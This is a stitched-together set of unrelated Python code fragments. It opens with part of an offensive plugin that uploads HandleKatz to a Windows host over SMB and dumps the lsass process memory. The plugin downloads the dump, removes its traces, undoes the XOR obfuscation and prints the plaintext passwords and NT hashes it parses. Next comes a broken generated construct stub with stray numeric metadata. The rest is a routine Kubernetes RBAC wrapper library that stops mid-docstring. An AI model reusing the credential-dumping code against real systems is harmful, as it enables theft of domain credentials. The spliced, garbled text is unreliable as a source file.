        if self.useembeded:
with open(self.handlekatz_path + self.handlekatz, 'wb') as handlekatz:
handlekatz.write(self.handlekatz_embeded)
context.log.info('Copy {} to {}'.format(self.handlekatz_path + self.handlekatz, self.tmp_dir))
with open(self.handlekatz_path + self.handlekatz, 'rb') as handlekatz:
try:
connection.conn.putFile(self.share, self.tmp_share + self.handlekatz, handlekatz.read)
context.log.success('Created file {} on the \\\\{}{}'.format(self.handlekatz, self.share, self.tmp_share))
except Exception as e:
                context.log.error('Error writing file to share {}: {}'.format(self.share, e))
# get pid lsass
command = 'tasklist /v /fo csv | findstr /i "lsass"'
context.log.info('Getting lsass PID {}'.format(command))
p = connection.execute(command, True)
pid = p.split(',')[1][1:-1]
command = self.tmp_dir + self.handlekatz + ' --pid:' + pid + ' --outfile:' + self.tmp_dir + '%COMPUTERNAME%-%PROCESSOR_ARCHITECTURE%-%USERDOMAIN%.log'
context.log.info('Executing command {}'.format(command))
p = connection.execute(command, True)
context.log.debug(p)
dump = False
if 'Lsass dump is complete' in p:
context.log.success('Process lsass.exe was successfully dumped')
dump = True
else:
            context.log.error('Process lsass.exe could not be dumped, try with verbose')
if dump:
regex = r"([A-Za-z0-9-]*\.log)"
matches = re.search(regex, str(p), re.MULTILINE)
machine_name = ''
if matches:
machine_name = matches.group()
else:
                context.log.error("Error getting the lsass dump file name")
                sys.exit(1)
context.log.info('Copy {} to host'.format(machine_name))
with open(self.dir_result + machine_name, 'wb+') as dump_file:
try:
connection.conn.getFile(self.share, self.tmp_share + machine_name, dump_file.write)
context.log.success('Dumpfile of lsass.exe was transferred to {}'.format(self.dir_result + machine_name))
except Exception as e:
                    context.log.error('Error while getting file: {}'.format(e))
try:
connection.conn.deleteFile(self.share, self.tmp_share + self.handlekatz)
context.log.success('Deleted handlekatz file on the {} share'.format(self.share))
except Exception as e:
context.log.error('Error deleting handlekatz file on share {}: {}'.format(self.share, e))
try:
connection.conn.deleteFile(self.share, self.tmp_share + machine_name)
                context.log.success('Deleted lsass dump file on the {} share'.format(self.share))
            except Exception as e:
                context.log.error('Error deleting lsass dump file on share {}: {}'.format(self.share, e))
            with open(self.dir_result + machine_name, "rb") as h_in, \
                 open(self.dir_result + machine_name + ".decode", "wb") as h_out:
                bytes_in = bytearray(h_in.read())
                context.log.info("Deobfuscating, this might take a while")
                # the dump is XOR-obfuscated with the single-byte key 0x41; undo it in 1 MB chunks
                chunks = [bytes_in[i:i + 1000000] for i in range(0, len(bytes_in), 1000000)]
                for chunk in chunks:
                    for i in range(len(chunk)):
                        chunk[i] ^= 0x41
                    h_out.write(bytes(chunk))
with open(self.dir_result + machine_name + ".decode", 'rb') as dump:
try:
credentials = []
credz_bh = []
pypy_parse = pypykatz.parse_minidump_external(dump)
ssps = ['msv_creds', 'wdigest_creds', 'ssp_creds', 'livessp_creds', 'kerberos_creds', 'credman_creds',
'tspkg_creds']
for luid in pypy_parse.logon_sessions:
for ssp in ssps:
for cred in getattr(pypy_parse.logon_sessions[luid], ssp, []):
domain = getattr(cred, "domainname", None)
username = getattr(cred, "username", None)
password = getattr(cred, "password", None)
NThash = getattr(cred, "NThash", None)
if NThash is not None:
NThash = NThash.hex()
if username and (password or NThash) and "$" not in username:
print_pass = password if password else NThash
context.log.highlight(domain + "\\" + username + ":" + print_pass)
if "." not in domain and domain.upper() in connection.domain.upper():
domain = connection.domain
credz_bh.append({'username': username.upper(), 'domain': domain.upper()})
if len(credz_bh) > 0:
add_user_bh(credz_bh, None, context.log, connection.config)
except Exception as e:
                    context.log.error('Error opening dump file: {}'.format(e))
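The deobfuscation pass above XORs every byte of the transferred dump with the single-byte key `0x41`, processing in 1 MB chunks. A dependency-free sketch of the same transform (the function name `xor_deobfuscate` is illustrative, not part of this module):

```python
def xor_deobfuscate(data: bytes, key: int = 0x41, chunk_size: int = 1000000) -> bytes:
    """Undo HandleKatz's single-byte XOR obfuscation, chunk by chunk."""
    out = bytearray()
    for start in range(0, len(data), chunk_size):
        chunk = bytearray(data[start:start + chunk_size])
        for i in range(len(chunk)):
            chunk[i] ^= key
        out += chunk
    return bytes(out)
```

Since XOR with a fixed key is its own inverse, the identical routine both obfuscates and deobfuscates.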
# compiled/construct/repeat_eos_bit.py (smarek/ci_targets, MIT license)
from construct import *
from construct.lib import *
repeat_eos_bit = Struct(
'nibbles' / GreedyRange(???),
)
_schema = repeat_eos_bit
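`GreedyRange` repeats its subconstruct until the end of the stream; the `???` above is the compiler's placeholder for a bit-sized element it could not express. A dependency-free sketch of the greedy-until-EOS behavior for byte-sized elements (the helper name is illustrative):

```python
import io

def greedy_range_bytes(stream) -> list:
    """Read one-byte elements until the stream is exhausted, GreedyRange-style."""
    out = []
    while True:
        b = stream.read(1)
        if not b:  # end of stream: stop repeating
            break
        out.append(b[0])
    return out
```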
| 15.222222 | 30 | 0.729927 | 17 | 137 | 5.588235 | 0.647059 | 0.273684 | 0.252632 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153285 | 137 | 8 | 31 | 17.125 | 0.818966 | 0 | 0 | 0 | 0 | 0 | 0.051095 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.333333 | null | null | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
# kuber/v1_18/rbac_v1beta1.py (datalayer-externals/kuber, MIT license)
import typing  # noqa: F401
from kubernetes import client # noqa: F401
from kuber import kube_api as _kube_api # noqa: F401
from kuber import definitions as _kuber_definitions # noqa: F401
from kuber import _types # noqa: F401
from kuber.v1_18.meta_v1 import LabelSelector # noqa: F401
from kuber.v1_18.meta_v1 import ListMeta # noqa: F401
from kuber.v1_18.meta_v1 import ObjectMeta # noqa: F401
class AggregationRule(_kuber_definitions.Definition):
"""
AggregationRule describes how to locate ClusterRoles to
aggregate into the ClusterRole
"""
def __init__(
self,
cluster_role_selectors: typing.List["LabelSelector"] = None,
):
"""Create AggregationRule instance."""
super(AggregationRule, self).__init__(
api_version="rbac.authorization.k8s.io/v1beta1", kind="AggregationRule"
)
self._properties = {
"clusterRoleSelectors": cluster_role_selectors
if cluster_role_selectors is not None
else [],
}
self._types = {
"clusterRoleSelectors": (list, LabelSelector),
}
@property
def cluster_role_selectors(self) -> typing.List["LabelSelector"]:
"""
ClusterRoleSelectors holds a list of selectors which will be
used to find ClusterRoles and create the rules. If any of
the selectors match, then the ClusterRole's permissions will
be added
"""
return typing.cast(
typing.List["LabelSelector"],
self._properties.get("clusterRoleSelectors"),
)
@cluster_role_selectors.setter
def cluster_role_selectors(
self, value: typing.Union[typing.List["LabelSelector"], typing.List[dict]]
):
"""
ClusterRoleSelectors holds a list of selectors which will be
used to find ClusterRoles and create the rules. If any of
the selectors match, then the ClusterRole's permissions will
be added
"""
cleaned: typing.List[LabelSelector] = []
for item in value:
if isinstance(item, dict):
item = typing.cast(
LabelSelector,
LabelSelector().from_dict(item),
)
cleaned.append(typing.cast(LabelSelector, item))
self._properties["clusterRoleSelectors"] = cleaned
def __enter__(self) -> "AggregationRule":
return self
def __exit__(self, exc_type, exc_val, exc_tb):
return False
class ClusterRole(_kuber_definitions.Resource):
"""
ClusterRole is a cluster level, logical grouping of
PolicyRules that can be referenced as a unit by a
RoleBinding or ClusterRoleBinding. Deprecated in v1.17 in
favor of rbac.authorization.k8s.io/v1 ClusterRole, and will
no longer be served in v1.20.
"""
def __init__(
self,
aggregation_rule: "AggregationRule" = None,
metadata: "ObjectMeta" = None,
rules: typing.List["PolicyRule"] = None,
):
"""Create ClusterRole instance."""
super(ClusterRole, self).__init__(
api_version="rbac.authorization.k8s.io/v1beta1", kind="ClusterRole"
)
self._properties = {
"aggregationRule": aggregation_rule
if aggregation_rule is not None
else AggregationRule(),
"metadata": metadata if metadata is not None else ObjectMeta(),
"rules": rules if rules is not None else [],
}
self._types = {
"aggregationRule": (AggregationRule, None),
"apiVersion": (str, None),
"kind": (str, None),
"metadata": (ObjectMeta, None),
"rules": (list, PolicyRule),
}
@property
def aggregation_rule(self) -> "AggregationRule":
"""
AggregationRule is an optional field that describes how to
build the Rules for this ClusterRole. If AggregationRule is
set, then the Rules are controller managed and direct
changes to Rules will be stomped by the controller.
"""
return typing.cast(
"AggregationRule",
self._properties.get("aggregationRule"),
)
@aggregation_rule.setter
def aggregation_rule(self, value: typing.Union["AggregationRule", dict]):
"""
AggregationRule is an optional field that describes how to
build the Rules for this ClusterRole. If AggregationRule is
set, then the Rules are controller managed and direct
changes to Rules will be stomped by the controller.
"""
if isinstance(value, dict):
value = typing.cast(
AggregationRule,
AggregationRule().from_dict(value),
)
self._properties["aggregationRule"] = value
@property
def metadata(self) -> "ObjectMeta":
"""
Standard object's metadata.
"""
return typing.cast(
"ObjectMeta",
self._properties.get("metadata"),
)
@metadata.setter
def metadata(self, value: typing.Union["ObjectMeta", dict]):
"""
Standard object's metadata.
"""
if isinstance(value, dict):
value = typing.cast(
ObjectMeta,
ObjectMeta().from_dict(value),
)
self._properties["metadata"] = value
@property
def rules(self) -> typing.List["PolicyRule"]:
"""
Rules holds all the PolicyRules for this ClusterRole
"""
return typing.cast(
typing.List["PolicyRule"],
self._properties.get("rules"),
)
@rules.setter
def rules(self, value: typing.Union[typing.List["PolicyRule"], typing.List[dict]]):
"""
Rules holds all the PolicyRules for this ClusterRole
"""
cleaned: typing.List[PolicyRule] = []
for item in value:
if isinstance(item, dict):
item = typing.cast(
PolicyRule,
PolicyRule().from_dict(item),
)
cleaned.append(typing.cast(PolicyRule, item))
self._properties["rules"] = cleaned
def create_resource(self, namespace: "str" = None):
"""
Creates the ClusterRole in the currently
configured Kubernetes cluster.
"""
names = ["create_namespaced_cluster_role", "create_cluster_role"]
_kube_api.execute(
action="create",
resource=self,
names=names,
namespace=namespace,
api_client=None,
api_args={"body": self.to_dict()},
)
def replace_resource(self, namespace: "str" = None):
"""
Replaces the ClusterRole in the currently
configured Kubernetes cluster.
"""
names = ["replace_namespaced_cluster_role", "replace_cluster_role"]
_kube_api.execute(
action="replace",
resource=self,
names=names,
namespace=namespace,
api_client=None,
api_args={"body": self.to_dict(), "name": self.metadata.name},
)
def patch_resource(self, namespace: "str" = None):
"""
Patches the ClusterRole in the currently
configured Kubernetes cluster.
"""
names = ["patch_namespaced_cluster_role", "patch_cluster_role"]
_kube_api.execute(
action="patch",
resource=self,
names=names,
namespace=namespace,
api_client=None,
api_args={"body": self.to_dict(), "name": self.metadata.name},
)
def get_resource_status(self, namespace: "str" = None):
"""This resource does not have a status."""
pass
def read_resource(self, namespace: str = None):
"""
Reads the ClusterRole from the currently configured
Kubernetes cluster and returns the low-level definition object.
"""
names = [
"read_namespaced_cluster_role",
"read_cluster_role",
]
return _kube_api.execute(
action="read",
resource=self,
names=names,
namespace=namespace,
api_client=None,
api_args={"name": self.metadata.name},
)
def delete_resource(
self,
namespace: str = None,
propagation_policy: str = "Foreground",
grace_period_seconds: int = 10,
):
"""
Deletes the ClusterRole from the currently configured
Kubernetes cluster.
"""
names = [
"delete_namespaced_cluster_role",
"delete_cluster_role",
]
body = client.V1DeleteOptions(
propagation_policy=propagation_policy,
grace_period_seconds=grace_period_seconds,
)
_kube_api.execute(
action="delete",
resource=self,
names=names,
namespace=namespace,
api_client=None,
api_args={"name": self.metadata.name, "body": body},
)
@staticmethod
def get_resource_api(
api_client: client.ApiClient = None, **kwargs
) -> "client.RbacAuthorizationV1beta1Api":
"""
Returns an instance of the kubernetes API client associated with
this object.
"""
if api_client:
            kwargs["api_client"] = api_client
return client.RbacAuthorizationV1beta1Api(**kwargs)
def __enter__(self) -> "ClusterRole":
return self
def __exit__(self, exc_type, exc_val, exc_tb):
return False
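# Example (illustrative sketch): building a ClusterRole and creating it in the
# currently configured cluster. Kept as a comment so importing this generated
# module stays side-effect free; the resource and rule names are assumptions
# for demonstration, not part of the generated API.
#
#   with ClusterRole(metadata=ObjectMeta(name="pod-reader")) as role:
#       role.rules = [
#           PolicyRule(api_groups=[""], resources=["pods"], verbs=["get"]),
#       ]
#       role.create_resource()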
class ClusterRoleBinding(_kuber_definitions.Resource):
"""
    ClusterRoleBinding references a ClusterRole, but does not
    contain it. It can reference a ClusterRole in the global
    namespace, and adds who information via Subject. Deprecated
    in v1.17 in favor of rbac.authorization.k8s.io/v1
    ClusterRoleBinding, and will no longer be served in v1.20.
"""
def __init__(
self,
metadata: "ObjectMeta" = None,
role_ref: "RoleRef" = None,
subjects: typing.List["Subject"] = None,
):
"""Create ClusterRoleBinding instance."""
super(ClusterRoleBinding, self).__init__(
api_version="rbac.authorization.k8s.io/v1beta1", kind="ClusterRoleBinding"
)
self._properties = {
"metadata": metadata if metadata is not None else ObjectMeta(),
"roleRef": role_ref if role_ref is not None else RoleRef(),
"subjects": subjects if subjects is not None else [],
}
self._types = {
"apiVersion": (str, None),
"kind": (str, None),
"metadata": (ObjectMeta, None),
"roleRef": (RoleRef, None),
"subjects": (list, Subject),
}
@property
def metadata(self) -> "ObjectMeta":
"""
Standard object's metadata.
"""
return typing.cast(
"ObjectMeta",
self._properties.get("metadata"),
)
@metadata.setter
def metadata(self, value: typing.Union["ObjectMeta", dict]):
"""
Standard object's metadata.
"""
if isinstance(value, dict):
value = typing.cast(
ObjectMeta,
ObjectMeta().from_dict(value),
)
self._properties["metadata"] = value
@property
def role_ref(self) -> "RoleRef":
"""
RoleRef can only reference a ClusterRole in the global
namespace. If the RoleRef cannot be resolved, the Authorizer
must return an error.
"""
return typing.cast(
"RoleRef",
self._properties.get("roleRef"),
)
@role_ref.setter
def role_ref(self, value: typing.Union["RoleRef", dict]):
"""
RoleRef can only reference a ClusterRole in the global
namespace. If the RoleRef cannot be resolved, the Authorizer
must return an error.
"""
if isinstance(value, dict):
value = typing.cast(
RoleRef,
RoleRef().from_dict(value),
)
self._properties["roleRef"] = value
@property
def subjects(self) -> typing.List["Subject"]:
"""
Subjects holds references to the objects the role applies
to.
"""
return typing.cast(
typing.List["Subject"],
self._properties.get("subjects"),
)
@subjects.setter
def subjects(self, value: typing.Union[typing.List["Subject"], typing.List[dict]]):
"""
Subjects holds references to the objects the role applies
to.
"""
cleaned: typing.List[Subject] = []
for item in value:
if isinstance(item, dict):
item = typing.cast(
Subject,
Subject().from_dict(item),
)
cleaned.append(typing.cast(Subject, item))
self._properties["subjects"] = cleaned
def create_resource(self, namespace: "str" = None):
"""
Creates the ClusterRoleBinding in the currently
configured Kubernetes cluster.
"""
names = [
"create_namespaced_cluster_role_binding",
"create_cluster_role_binding",
]
_kube_api.execute(
action="create",
resource=self,
names=names,
namespace=namespace,
api_client=None,
api_args={"body": self.to_dict()},
)
def replace_resource(self, namespace: "str" = None):
"""
Replaces the ClusterRoleBinding in the currently
configured Kubernetes cluster.
"""
names = [
"replace_namespaced_cluster_role_binding",
"replace_cluster_role_binding",
]
_kube_api.execute(
action="replace",
resource=self,
names=names,
namespace=namespace,
api_client=None,
api_args={"body": self.to_dict(), "name": self.metadata.name},
)
def patch_resource(self, namespace: "str" = None):
"""
Patches the ClusterRoleBinding in the currently
configured Kubernetes cluster.
"""
names = ["patch_namespaced_cluster_role_binding", "patch_cluster_role_binding"]
_kube_api.execute(
action="patch",
resource=self,
names=names,
namespace=namespace,
api_client=None,
api_args={"body": self.to_dict(), "name": self.metadata.name},
)
def get_resource_status(self, namespace: "str" = None):
"""This resource does not have a status."""
pass
def read_resource(self, namespace: str = None):
"""
Reads the ClusterRoleBinding from the currently configured
Kubernetes cluster and returns the low-level definition object.
"""
names = [
"read_namespaced_cluster_role_binding",
"read_cluster_role_binding",
]
return _kube_api.execute(
action="read",
resource=self,
names=names,
namespace=namespace,
api_client=None,
api_args={"name": self.metadata.name},
)
def delete_resource(
self,
namespace: str = None,
propagation_policy: str = "Foreground",
grace_period_seconds: int = 10,
):
"""
Deletes the ClusterRoleBinding from the currently configured
Kubernetes cluster.
"""
names = [
"delete_namespaced_cluster_role_binding",
"delete_cluster_role_binding",
]
body = client.V1DeleteOptions(
propagation_policy=propagation_policy,
grace_period_seconds=grace_period_seconds,
)
_kube_api.execute(
action="delete",
resource=self,
names=names,
namespace=namespace,
api_client=None,
api_args={"name": self.metadata.name, "body": body},
)
@staticmethod
def get_resource_api(
api_client: client.ApiClient = None, **kwargs
) -> "client.RbacAuthorizationV1beta1Api":
"""
Returns an instance of the kubernetes API client associated with
this object.
"""
if api_client:
            kwargs["api_client"] = api_client
return client.RbacAuthorizationV1beta1Api(**kwargs)
def __enter__(self) -> "ClusterRoleBinding":
return self
def __exit__(self, exc_type, exc_val, exc_tb):
return False
class ClusterRoleBindingList(_kuber_definitions.Collection):
"""
ClusterRoleBindingList is a collection of
ClusterRoleBindings. Deprecated in v1.17 in favor of
rbac.authorization.k8s.io/v1 ClusterRoleBindingList, and
will no longer be served in v1.20.
"""
def __init__(
self,
items: typing.List["ClusterRoleBinding"] = None,
metadata: "ListMeta" = None,
):
"""Create ClusterRoleBindingList instance."""
super(ClusterRoleBindingList, self).__init__(
api_version="rbac.authorization.k8s.io/v1beta1",
kind="ClusterRoleBindingList",
)
self._properties = {
"items": items if items is not None else [],
"metadata": metadata if metadata is not None else ListMeta(),
}
self._types = {
"apiVersion": (str, None),
"items": (list, ClusterRoleBinding),
"kind": (str, None),
"metadata": (ListMeta, None),
}
@property
def items(self) -> typing.List["ClusterRoleBinding"]:
"""
Items is a list of ClusterRoleBindings
"""
return typing.cast(
typing.List["ClusterRoleBinding"],
self._properties.get("items"),
)
@items.setter
def items(
self, value: typing.Union[typing.List["ClusterRoleBinding"], typing.List[dict]]
):
"""
Items is a list of ClusterRoleBindings
"""
cleaned: typing.List[ClusterRoleBinding] = []
for item in value:
if isinstance(item, dict):
item = typing.cast(
ClusterRoleBinding,
ClusterRoleBinding().from_dict(item),
)
cleaned.append(typing.cast(ClusterRoleBinding, item))
self._properties["items"] = cleaned
@property
def metadata(self) -> "ListMeta":
"""
Standard object's metadata.
"""
return typing.cast(
"ListMeta",
self._properties.get("metadata"),
)
@metadata.setter
def metadata(self, value: typing.Union["ListMeta", dict]):
"""
Standard object's metadata.
"""
if isinstance(value, dict):
value = typing.cast(
ListMeta,
ListMeta().from_dict(value),
)
self._properties["metadata"] = value
@staticmethod
def get_resource_api(
api_client: client.ApiClient = None, **kwargs
) -> "client.RbacAuthorizationV1beta1Api":
"""
Returns an instance of the kubernetes API client associated with
this object.
"""
if api_client:
            kwargs["api_client"] = api_client
return client.RbacAuthorizationV1beta1Api(**kwargs)
def __enter__(self) -> "ClusterRoleBindingList":
return self
def __exit__(self, exc_type, exc_val, exc_tb):
return False
class ClusterRoleList(_kuber_definitions.Collection):
"""
ClusterRoleList is a collection of ClusterRoles. Deprecated
in v1.17 in favor of rbac.authorization.k8s.io/v1
ClusterRoles, and will no longer be served in v1.20.
"""
def __init__(
self,
items: typing.List["ClusterRole"] = None,
metadata: "ListMeta" = None,
):
"""Create ClusterRoleList instance."""
super(ClusterRoleList, self).__init__(
api_version="rbac.authorization.k8s.io/v1beta1", kind="ClusterRoleList"
)
self._properties = {
"items": items if items is not None else [],
"metadata": metadata if metadata is not None else ListMeta(),
}
self._types = {
"apiVersion": (str, None),
"items": (list, ClusterRole),
"kind": (str, None),
"metadata": (ListMeta, None),
}
@property
def items(self) -> typing.List["ClusterRole"]:
"""
Items is a list of ClusterRoles
"""
return typing.cast(
typing.List["ClusterRole"],
self._properties.get("items"),
)
@items.setter
def items(self, value: typing.Union[typing.List["ClusterRole"], typing.List[dict]]):
"""
Items is a list of ClusterRoles
"""
cleaned: typing.List[ClusterRole] = []
for item in value:
if isinstance(item, dict):
item = typing.cast(
ClusterRole,
ClusterRole().from_dict(item),
)
cleaned.append(typing.cast(ClusterRole, item))
self._properties["items"] = cleaned
@property
def metadata(self) -> "ListMeta":
"""
Standard object's metadata.
"""
return typing.cast(
"ListMeta",
self._properties.get("metadata"),
)
@metadata.setter
def metadata(self, value: typing.Union["ListMeta", dict]):
"""
Standard object's metadata.
"""
if isinstance(value, dict):
value = typing.cast(
ListMeta,
ListMeta().from_dict(value),
)
self._properties["metadata"] = value
@staticmethod
def get_resource_api(
api_client: client.ApiClient = None, **kwargs
) -> "client.RbacAuthorizationV1beta1Api":
"""
Returns an instance of the kubernetes API client associated with
this object.
"""
if api_client:
            kwargs["api_client"] = api_client
return client.RbacAuthorizationV1beta1Api(**kwargs)
def __enter__(self) -> "ClusterRoleList":
return self
def __exit__(self, exc_type, exc_val, exc_tb):
return False
class PolicyRule(_kuber_definitions.Definition):
"""
PolicyRule holds information that describes a policy rule,
but does not contain information about who the rule applies
to or which namespace the rule applies to.
"""
def __init__(
self,
api_groups: typing.List[str] = None,
non_resource_urls: typing.List[str] = None,
resource_names: typing.List[str] = None,
resources: typing.List[str] = None,
verbs: typing.List[str] = None,
):
"""Create PolicyRule instance."""
super(PolicyRule, self).__init__(
api_version="rbac.authorization.k8s.io/v1beta1", kind="PolicyRule"
)
self._properties = {
"apiGroups": api_groups if api_groups is not None else [],
"nonResourceURLs": non_resource_urls
if non_resource_urls is not None
else [],
"resourceNames": resource_names if resource_names is not None else [],
"resources": resources if resources is not None else [],
"verbs": verbs if verbs is not None else [],
}
self._types = {
"apiGroups": (list, str),
"nonResourceURLs": (list, str),
"resourceNames": (list, str),
"resources": (list, str),
"verbs": (list, str),
}
@property
def api_groups(self) -> typing.List[str]:
"""
APIGroups is the name of the APIGroup that contains the
resources. If multiple API groups are specified, any action
requested against one of the enumerated resources in any API
group will be allowed.
"""
return typing.cast(
typing.List[str],
self._properties.get("apiGroups"),
)
@api_groups.setter
def api_groups(self, value: typing.List[str]):
"""
APIGroups is the name of the APIGroup that contains the
resources. If multiple API groups are specified, any action
requested against one of the enumerated resources in any API
group will be allowed.
"""
self._properties["apiGroups"] = value
@property
def non_resource_urls(self) -> typing.List[str]:
"""
NonResourceURLs is a set of partial urls that a user should
have access to. *s are allowed, but only as the full, final
        step in the path. Since non-resource URLs are not namespaced,
this field is only applicable for ClusterRoles referenced
from a ClusterRoleBinding. Rules can either apply to API
resources (such as "pods" or "secrets") or non-resource URL
paths (such as "/api"), but not both.
"""
return typing.cast(
typing.List[str],
self._properties.get("nonResourceURLs"),
)
@non_resource_urls.setter
def non_resource_urls(self, value: typing.List[str]):
"""
NonResourceURLs is a set of partial urls that a user should
have access to. *s are allowed, but only as the full, final
        step in the path. Since non-resource URLs are not namespaced,
this field is only applicable for ClusterRoles referenced
from a ClusterRoleBinding. Rules can either apply to API
resources (such as "pods" or "secrets") or non-resource URL
paths (such as "/api"), but not both.
"""
self._properties["nonResourceURLs"] = value
@property
def resource_names(self) -> typing.List[str]:
"""
ResourceNames is an optional white list of names that the
rule applies to. An empty set means that everything is
allowed.
"""
return typing.cast(
typing.List[str],
self._properties.get("resourceNames"),
)
@resource_names.setter
def resource_names(self, value: typing.List[str]):
"""
ResourceNames is an optional white list of names that the
rule applies to. An empty set means that everything is
allowed.
"""
self._properties["resourceNames"] = value
@property
def resources(self) -> typing.List[str]:
"""
Resources is a list of resources this rule applies to. '*'
represents all resources in the specified apiGroups. '*/foo'
represents the subresource 'foo' for all resources in the
specified apiGroups.
"""
return typing.cast(
typing.List[str],
self._properties.get("resources"),
)
@resources.setter
def resources(self, value: typing.List[str]):
"""
Resources is a list of resources this rule applies to. '*'
represents all resources in the specified apiGroups. '*/foo'
represents the subresource 'foo' for all resources in the
specified apiGroups.
"""
self._properties["resources"] = value
@property
def verbs(self) -> typing.List[str]:
"""
Verbs is a list of Verbs that apply to ALL the ResourceKinds
and AttributeRestrictions contained in this rule. VerbAll
represents all kinds.
"""
return typing.cast(
typing.List[str],
self._properties.get("verbs"),
)
@verbs.setter
def verbs(self, value: typing.List[str]):
"""
Verbs is a list of Verbs that apply to ALL the ResourceKinds
and AttributeRestrictions contained in this rule. VerbAll
represents all kinds.
"""
self._properties["verbs"] = value
def __enter__(self) -> "PolicyRule":
return self
def __exit__(self, exc_type, exc_val, exc_tb):
return False
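# Example (illustrative sketch): a PolicyRule granting read-only access to
# pods in the core API group. The field values below are assumptions chosen
# for demonstration; they map onto the properties defined above.
#
#   rule = PolicyRule(
#       api_groups=[""],  # "" selects the core API group
#       resources=["pods"],
#       verbs=["get", "list", "watch"],
#   )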
class Role(_kuber_definitions.Resource):
"""
Role is a namespaced, logical grouping of PolicyRules that
can be referenced as a unit by a RoleBinding. Deprecated in
v1.17 in favor of rbac.authorization.k8s.io/v1 Role, and
will no longer be served in v1.20.
"""
def __init__(
self,
metadata: "ObjectMeta" = None,
rules: typing.List["PolicyRule"] = None,
):
"""Create Role instance."""
super(Role, self).__init__(
api_version="rbac.authorization.k8s.io/v1beta1", kind="Role"
)
self._properties = {
"metadata": metadata if metadata is not None else ObjectMeta(),
"rules": rules if rules is not None else [],
}
self._types = {
"apiVersion": (str, None),
"kind": (str, None),
"metadata": (ObjectMeta, None),
"rules": (list, PolicyRule),
}
@property
def metadata(self) -> "ObjectMeta":
"""
Standard object's metadata.
"""
return typing.cast(
"ObjectMeta",
self._properties.get("metadata"),
)
@metadata.setter
def metadata(self, value: typing.Union["ObjectMeta", dict]):
"""
Standard object's metadata.
"""
if isinstance(value, dict):
value = typing.cast(
ObjectMeta,
ObjectMeta().from_dict(value),
)
self._properties["metadata"] = value
@property
def rules(self) -> typing.List["PolicyRule"]:
"""
Rules holds all the PolicyRules for this Role
"""
return typing.cast(
typing.List["PolicyRule"],
self._properties.get("rules"),
)
@rules.setter
def rules(self, value: typing.Union[typing.List["PolicyRule"], typing.List[dict]]):
"""
Rules holds all the PolicyRules for this Role
"""
cleaned: typing.List[PolicyRule] = []
for item in value:
if isinstance(item, dict):
item = typing.cast(
PolicyRule,
PolicyRule().from_dict(item),
)
cleaned.append(typing.cast(PolicyRule, item))
self._properties["rules"] = cleaned
def create_resource(self, namespace: "str" = None):
"""
Creates the Role in the currently
configured Kubernetes cluster.
"""
names = ["create_namespaced_role", "create_role"]
_kube_api.execute(
action="create",
resource=self,
names=names,
namespace=namespace,
api_client=None,
api_args={"body": self.to_dict()},
)
def replace_resource(self, namespace: "str" = None):
"""
Replaces the Role in the currently
configured Kubernetes cluster.
"""
names = ["replace_namespaced_role", "replace_role"]
_kube_api.execute(
action="replace",
resource=self,
names=names,
namespace=namespace,
api_client=None,
api_args={"body": self.to_dict(), "name": self.metadata.name},
)
def patch_resource(self, namespace: "str" = None):
"""
Patches the Role in the currently
configured Kubernetes cluster.
"""
names = ["patch_namespaced_role", "patch_role"]
_kube_api.execute(
action="patch",
resource=self,
names=names,
namespace=namespace,
api_client=None,
api_args={"body": self.to_dict(), "name": self.metadata.name},
)
def get_resource_status(self, namespace: "str" = None):
"""This resource does not have a status."""
pass
def read_resource(self, namespace: str = None):
"""
Reads the Role from the currently configured
Kubernetes cluster and returns the low-level definition object.
"""
names = [
"read_namespaced_role",
"read_role",
]
return _kube_api.execute(
action="read",
resource=self,
names=names,
namespace=namespace,
api_client=None,
api_args={"name": self.metadata.name},
)
def delete_resource(
self,
namespace: str = None,
propagation_policy: str = "Foreground",
grace_period_seconds: int = 10,
):
"""
Deletes the Role from the currently configured
Kubernetes cluster.
"""
names = [
"delete_namespaced_role",
"delete_role",
]
body = client.V1DeleteOptions(
propagation_policy=propagation_policy,
grace_period_seconds=grace_period_seconds,
)
_kube_api.execute(
action="delete",
resource=self,
names=names,
namespace=namespace,
api_client=None,
api_args={"name": self.metadata.name, "body": body},
)
@staticmethod
def get_resource_api(
api_client: client.ApiClient = None, **kwargs
) -> "client.RbacAuthorizationV1beta1Api":
"""
Returns an instance of the kubernetes API client associated with
this object.
"""
if api_client:
            kwargs["api_client"] = api_client
return client.RbacAuthorizationV1beta1Api(**kwargs)
def __enter__(self) -> "Role":
return self
def __exit__(self, exc_type, exc_val, exc_tb):
return False
class RoleBinding(_kuber_definitions.Resource):
"""
RoleBinding references a role, but does not contain it. It
can reference a Role in the same namespace or a ClusterRole
in the global namespace. It adds who information via
Subjects and namespace information by which namespace it
exists in. RoleBindings in a given namespace only have
effect in that namespace. Deprecated in v1.17 in favor of
rbac.authorization.k8s.io/v1 RoleBinding, and will no longer
be served in v1.20.
"""
def __init__(
self,
metadata: "ObjectMeta" = None,
role_ref: "RoleRef" = None,
subjects: typing.List["Subject"] = None,
):
"""Create RoleBinding instance."""
super(RoleBinding, self).__init__(
api_version="rbac.authorization.k8s.io/v1beta1", kind="RoleBinding"
)
self._properties = {
"metadata": metadata if metadata is not None else ObjectMeta(),
"roleRef": role_ref if role_ref is not None else RoleRef(),
"subjects": subjects if subjects is not None else [],
}
self._types = {
"apiVersion": (str, None),
"kind": (str, None),
"metadata": (ObjectMeta, None),
"roleRef": (RoleRef, None),
"subjects": (list, Subject),
}
@property
def metadata(self) -> "ObjectMeta":
"""
Standard object's metadata.
"""
return typing.cast(
"ObjectMeta",
self._properties.get("metadata"),
)
@metadata.setter
def metadata(self, value: typing.Union["ObjectMeta", dict]):
"""
Standard object's metadata.
"""
if isinstance(value, dict):
value = typing.cast(
ObjectMeta,
ObjectMeta().from_dict(value),
)
self._properties["metadata"] = value
@property
def role_ref(self) -> "RoleRef":
"""
RoleRef can reference a Role in the current namespace or a
ClusterRole in the global namespace. If the RoleRef cannot
be resolved, the Authorizer must return an error.
"""
return typing.cast(
"RoleRef",
self._properties.get("roleRef"),
)
@role_ref.setter
def role_ref(self, value: typing.Union["RoleRef", dict]):
"""
RoleRef can reference a Role in the current namespace or a
ClusterRole in the global namespace. If the RoleRef cannot
be resolved, the Authorizer must return an error.
